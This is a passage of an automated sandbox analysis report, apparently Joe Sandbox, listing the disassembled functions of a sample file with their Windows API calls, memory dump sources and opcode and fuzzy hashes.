                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID: 3Ro
                                                                                                                                  • API String ID: 1269201914-1492261280
                                                                                                                                  • Opcode ID: 24d4f0df55a83865206bfd108a2695966601c4d50d384119de691d83ce424af5
                                                                                                                                  • Instruction ID: f96f846dec16ecb393ebfa7f10367bdf5e96d09923cd7d45a4243983f58b8237
                                                                                                                                  • Opcode Fuzzy Hash: 24d4f0df55a83865206bfd108a2695966601c4d50d384119de691d83ce424af5
                                                                                                                                  • Instruction Fuzzy Hash: 83B012C629B5577D350472052E02CF7065DF6E0B90330D13FF410D43C1DC805C011472
                                                                                                                                  Function 008CBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008CB7BB: GetOEMCP.KERNEL32(00000000,?,?,008CBA44,?), ref: 008CB7E6
                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,008CBA89,?,00000000), ref: 008CBC64
                                                                                                                                  • GetCPInfo.KERNEL32(00000000,008CBA89,?,?,?,008CBA89,?,00000000), ref: 008CBC77
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 546120528-0
                                                                                                                                  • Opcode ID: 31ba9b2f78539b9f6e9b8372412d839843f24221e307bce3b7b7bd56a752082d
                                                                                                                                  • Instruction ID: 38aa7c5f0472e2cc0a825bb651e40cd90f95b92ff531d15a1639cb0122c096a4
                                                                                                                                  • Opcode Fuzzy Hash: 31ba9b2f78539b9f6e9b8372412d839843f24221e307bce3b7b7bd56a752082d
                                                                                                                                  • Instruction Fuzzy Hash: B3513270A00A499EDB209F75C882FBABBF4FF41310F18406ED596CB252DB35D946CB91
                                                                                                                                  Function 008A9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,008A9A50,?,?,00000000,?,?,008A8CBC,?), ref: 008A9BAB
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,008A8411,-00009570,00000000,000007F3), ref: 008A9BB6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                  • Opcode ID: a686fb108465a0c52103a1eb8780121fc8e6bb86c509b3afdd696e63246a87f6
                                                                                                                                  • Instruction ID: ba8db1f522de93b782e322a84a06e93cff43636f43af5474ede6f41cf5aaadde
                                                                                                                                  • Opcode Fuzzy Hash: a686fb108465a0c52103a1eb8780121fc8e6bb86c509b3afdd696e63246a87f6
                                                                                                                                  • Instruction Fuzzy Hash: 4B41D2305083258FEB24DF19E58456AB7E5FFD6330F148A2EE8C2C3A60D770ED468A61
                                                                                                                                  Function 008CBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008C97E5: GetLastError.KERNEL32(?,008E1030,008C4674,008E1030,?,?,008C3F73,00000050,?,008E1030,00000200), ref: 008C97E9
                                                                                                                                    • Part of subcall function 008C97E5: _free.LIBCMT ref: 008C981C
                                                                                                                                    • Part of subcall function 008C97E5: SetLastError.KERNEL32(00000000,?,008E1030,00000200), ref: 008C985D
                                                                                                                                    • Part of subcall function 008C97E5: _abort.LIBCMT ref: 008C9863
                                                                                                                                    • Part of subcall function 008CBB4E: _abort.LIBCMT ref: 008CBB80
                                                                                                                                    • Part of subcall function 008CBB4E: _free.LIBCMT ref: 008CBBB4
                                                                                                                                    • Part of subcall function 008CB7BB: GetOEMCP.KERNEL32(00000000,?,?,008CBA44,?), ref: 008CB7E6
                                                                                                                                  • _free.LIBCMT ref: 008CBA9F
                                                                                                                                  • _free.LIBCMT ref: 008CBAD5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorLast_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2991157371-0
                                                                                                                                  • Opcode ID: c62f1a1d73bc5ff2fa5d0ebcfef860ceab3e65f738eb2923054074c306a95a02
                                                                                                                                  • Instruction ID: 474cc11cd75316f08a4a626d618abe9b5d4360a472ef1a50f3ea988627e72696
                                                                                                                                  • Opcode Fuzzy Hash: c62f1a1d73bc5ff2fa5d0ebcfef860ceab3e65f738eb2923054074c306a95a02
                                                                                                                                  • Instruction Fuzzy Hash: 18318B31905619AFDB10EBA8D842FA9B7B5FB40320F25419EE944DB2A2EB32DD40DB51
                                                                                                                                  Function 008A1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A1E55
                                                                                                                                    • Part of subcall function 008A3BBA: __EH_prolog.LIBCMT ref: 008A3BBF
                                                                                                                                  • _wcslen.LIBCMT ref: 008A1EFD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog$_wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2838827086-0
                                                                                                                                  • Opcode ID: 0861469a8ff68e35cfdf5f32f2b607b0d08d15f66e527aefb87e86cbf0ded29c
                                                                                                                                  • Instruction ID: 00b541b98cd95e1244cbd47690674abd05d4b6bee3be369ac090e9bf4bb6ea76
                                                                                                                                  • Opcode Fuzzy Hash: 0861469a8ff68e35cfdf5f32f2b607b0d08d15f66e527aefb87e86cbf0ded29c
                                                                                                                                  • Instruction Fuzzy Hash: A2316871904208AFDF11DF98C959AEEBBF6FF09300F20006AE845E7651CB369E10CB61
                                                                                                                                  Function 008A9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008A73BC,?,?,?,00000000), ref: 008A9DBC
                                                                                                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 008A9E70
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$BuffersFlushTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1392018926-0
                                                                                                                                  • Opcode ID: d254a665da93099530960cc14c9023a9e0bd145c04459bcb76cf3e8ad3cade6b
                                                                                                                                  • Instruction ID: 0288468f391ab17fd92ea825e62b1546b0a099012bc84022a075ffaf6655fdd7
                                                                                                                                  • Opcode Fuzzy Hash: d254a665da93099530960cc14c9023a9e0bd145c04459bcb76cf3e8ad3cade6b
                                                                                                                                  • Instruction Fuzzy Hash: DC21E13124C2459BDB14CF34C491AABBBE8FF56304F08491DF4C5C7942D368D95C8B62
                                                                                                                                  Function 008A966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,008A9F27,?,?,008A771A), ref: 008A96E6
                                                                                                                                  • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,008A9F27,?,?,008A771A), ref: 008A9716
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                  • Opcode ID: 2b16d85ab9cca5f89907f5d87f9d6bd78c3f7ebbe6dc0d09a370d55e2c8750d3
                                                                                                                                  • Instruction ID: f42f9f2e60363aea297d7c0bb8ddbc91b2bc320fceaad1f52f12147631b26d12
                                                                                                                                  • Opcode Fuzzy Hash: 2b16d85ab9cca5f89907f5d87f9d6bd78c3f7ebbe6dc0d09a370d55e2c8750d3
                                                                                                                                  • Instruction Fuzzy Hash: D921AE711087446FF2708A698C89BA777DCFB5A324F100A19FAD5C69D1C764A8848632
                                                                                                                                  Function 008A9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 008A9EC7
                                                                                                                                  • GetLastError.KERNEL32 ref: 008A9ED4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                  • Opcode ID: 5fecb07128cbf61cb1fc681e9d9a2c752ac8912a4ba5c224b966745ee18a95a9
                                                                                                                                  • Instruction ID: 8ed362cabeaed82507cb967663953880a892f6c1743520588b19eee5405c3ff1
                                                                                                                                  • Opcode Fuzzy Hash: 5fecb07128cbf61cb1fc681e9d9a2c752ac8912a4ba5c224b966745ee18a95a9
                                                                                                                                  • Instruction Fuzzy Hash: 1611E530604704ABF724C628C844BA6B7E8FB46370F504A29E192D2ED1E7B0ED59C760
                                                                                                                                  Function 008C8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 008C8E75
                                                                                                                                    • Part of subcall function 008C8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008CCA2C,00000000,?,008C6CBE,?,00000008,?,008C91E0,?,?,?), ref: 008C8E38
                                                                                                                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,008E1098,008A17CE,?,?,00000007,?,?,?,008A13D6,?,00000000), ref: 008C8EB1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocAllocate_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2447670028-0
                                                                                                                                  • Opcode ID: 1391fb71fd5c5df96a50cb5b0aec6cc8aabd14de46466d10494e0a36a89b1e48
                                                                                                                                  • Instruction ID: d85ad9185c7ff27c049d46fc1e515bf72984a8ef1a9ed83975ad695332f96320
                                                                                                                                  • Opcode Fuzzy Hash: 1391fb71fd5c5df96a50cb5b0aec6cc8aabd14de46466d10494e0a36a89b1e48
                                                                                                                                  • Instruction Fuzzy Hash: DAF0F632685115EACB212A6DAC05FAF3778FF82B70F69412EF814EB191DF71DD0091A2
                                                                                                                                  Function 008B109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?), ref: 008B10AB
                                                                                                                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 008B10B2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1231390398-0
                                                                                                                                  • Opcode ID: 78384a384c86fc8cafefa8b616b67e7dc4975a9706e3cc5e3137cd1e9be91136
                                                                                                                                  • Instruction ID: 383c3c5537c720185ce54ce348b257e42958217c74943360918d61b119c8b913
                                                                                                                                  • Opcode Fuzzy Hash: 78384a384c86fc8cafefa8b616b67e7dc4975a9706e3cc5e3137cd1e9be91136
                                                                                                                                  • Instruction Fuzzy Hash: ECE0D832B00949A7CF19A7B49C198EB73EDFA442047108176E403DB201F930DE464A60
                                                                                                                                  Function 008C8268 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008CBF30: GetEnvironmentStringsW.KERNEL32 ref: 008CBF39
                                                                                                                                    • Part of subcall function 008CBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008CBF5C
                                                                                                                                    • Part of subcall function 008CBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008CBF82
                                                                                                                                    • Part of subcall function 008CBF30: _free.LIBCMT ref: 008CBF95
                                                                                                                                    • Part of subcall function 008CBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008CBFA4
                                                                                                                                  • _free.LIBCMT ref: 008C82AE
                                                                                                                                  • _free.LIBCMT ref: 008C82B5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 400815659-0
                                                                                                                                  • Opcode ID: a3e6cde1870f390c53d5f83e0b91d208b45e5ba238f32fb13905012ea47ce638
                                                                                                                                  • Instruction ID: 0b4441ba057898b62617836e75c8b33e2a09d14c5e284ce36314d944ba00944c
                                                                                                                                  • Opcode Fuzzy Hash: a3e6cde1870f390c53d5f83e0b91d208b45e5ba238f32fb13905012ea47ce638
                                                                                                                                  • Instruction Fuzzy Hash: ECE0E533695E52C9E265327D3C0AF6B0674EB81338F25022EF621D70C3CE30C80215A7
                                                                                                                                  Function 008AA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,008AA325,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA501
                                                                                                                                    • Part of subcall function 008ABB03: _wcslen.LIBCMT ref: 008ABB27
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,008AA325,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA532
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile$_wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2673547680-0
                                                                                                                                  • Opcode ID: 2c063ef97b14b41aac85c135a113199bcc477896193b69c70d0cc0c9f47b13b1
                                                                                                                                  • Instruction ID: d2bda2717be174a20dd6024543c9621319ac9920515c143bf3dd76abf399442d
                                                                                                                                  • Opcode Fuzzy Hash: 2c063ef97b14b41aac85c135a113199bcc477896193b69c70d0cc0c9f47b13b1
                                                                                                                                  • Instruction Fuzzy Hash: 2AF0A0312001097BEF015F60DC01FDA376CFB04385F448052B845D5160DB31DE94DA21
                                                                                                                                  Function 008AA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNELBASE(000000FF,?,?,008A977F,?,?,008A95CF,?,?,?,?,?,008D2641,000000FF), ref: 008AA1F1
                                                                                                                                    • Part of subcall function 008ABB03: _wcslen.LIBCMT ref: 008ABB27
                                                                                                                                  • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,008A977F,?,?,008A95CF,?,?,?,?,?,008D2641), ref: 008AA21F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DeleteFile$_wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2643169976-0
                                                                                                                                  • Opcode ID: 018983db4932dbe797f3fff351922a8fcab741cfbe46e9c1dc3623e12950fcf2
                                                                                                                                  • Instruction ID: 7f15be1fb4cccab0f4eafd8a4404f7ac55337d3eb7de662842f7283cfbdbd10e
                                                                                                                                  • Opcode Fuzzy Hash: 018983db4932dbe797f3fff351922a8fcab741cfbe46e9c1dc3623e12950fcf2
                                                                                                                                  • Instruction Fuzzy Hash: C8E092351402096BEB015F64DC45FDD379CFB09381F484021B945E2450EB61DE98DA62
                                                                                                                                  Function 008BAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,008D2641,000000FF), ref: 008BACB0
                                                                                                                                  • CoUninitialize.COMBASE(?,?,?,?,008D2641,000000FF), ref: 008BACB5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
